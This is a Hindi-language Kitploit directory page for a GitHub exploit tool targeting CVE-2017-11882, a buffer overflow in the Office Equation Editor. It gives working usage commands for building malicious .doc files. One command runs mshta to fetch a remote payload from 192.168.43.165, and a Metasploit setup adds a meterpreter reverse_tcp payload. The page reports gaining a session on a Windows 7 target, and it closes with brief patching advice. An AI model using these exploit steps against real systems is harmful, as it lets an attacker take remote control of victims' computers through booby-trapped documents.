Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-11882 — CVE-2017-11882(Office 2003 से 2016 तक के सभी संस्करणों का सार्वभौमिक शोषण) | Kitploit
उपकरण/GitHubGitHub/littlebin404/cve-2017-11882
शोषण फ्रेमवर्कपेलोड जनरेशनभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHublittlebin404/cve-2017-11882

CVE-2017-11882

CVE-2017-11882(Office 2003 से 2016 तक के सभी संस्करणों का सार्वभौमिक शोषण)

रिपॉजिटरी देखें
535 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-11882 अवलोकन

शोषण प्रभाव के दृष्टिकोण से, यह Office 2003 से 2016 के सभी संस्करणों को प्रभावित कर सकता है, और संपूर्ण आक्रमण वातावरण का निर्माण बहुत सरल है। यह भेद्यता Office सॉफ्टवेयर के [सूत्र संपादक] के कारण होती है, क्योंकि संपादक प्रक्रिया नाम की लंबाई की जाँच नहीं करती है, जिससे बफर ओवरफ्लो होता है। हमलावर विशेष वर्णों का निर्माण करके मनमाना कोड निष्पादित कर सकता है। उदाहरण के लिए, यदि कोई हैकर इस भेद्यता का उपयोग करके शेल बैकडोर युक्त Office फ़ाइल बनाता है, और एक सामान्य उपयोगकर्ता उस Office फ़ाइल को खोलता है, तो कंप्यूटर हैकर के सीधे नियंत्रण में आ सकता है।

प्रभावित संस्करण:

root@kitploit:~
office 2003 
office 2007 
office 2010 
office 2013 
office 2016

Usage

root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

Image

जनरेट की गई "test.doc" पर क्लिक करने पर कैलकुलेटर सफलतापूर्वक खुलता है।

root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc

Image

Image

11882-3.doc Word फ़ाइल सफलतापूर्वक बनाई।

cve_2017_11882.rb फ़ाइल को /usr/share/metasploit-framework/modules/exploits/windows/smb निर्देशिका में रखें:

root@kitploit:~
msf > search CVE-2017-11882
msf > use exploit/windows/smb/CVE-2017-11882 
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp 
msf exploit(CVE-2017-11882) > set lhost 192.168.43.165 
msf exploit(CVE-2017-11882) > set uripath 11882 
msf exploit(CVE-2017-11882) > exploit

लिसनिंग प्रारंभ करें:

Image

विन 7 लक्ष्य मशीन में 11882-3.doc फ़ाइल पर क्लिक करें, सत्र प्राप्त करने में सफल!

Image

भेद्यता समाधान

① ऑनलाइन अपडेट; विंडोज अपडेट चालू करें, यह विधि अधिकांश लोगों के लिए पर्याप्त है।

② पैच लगाएं; इस भेद्यता के लिए माइक्रोसॉफ्ट पैच पता: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

टूल डाउनलोड करें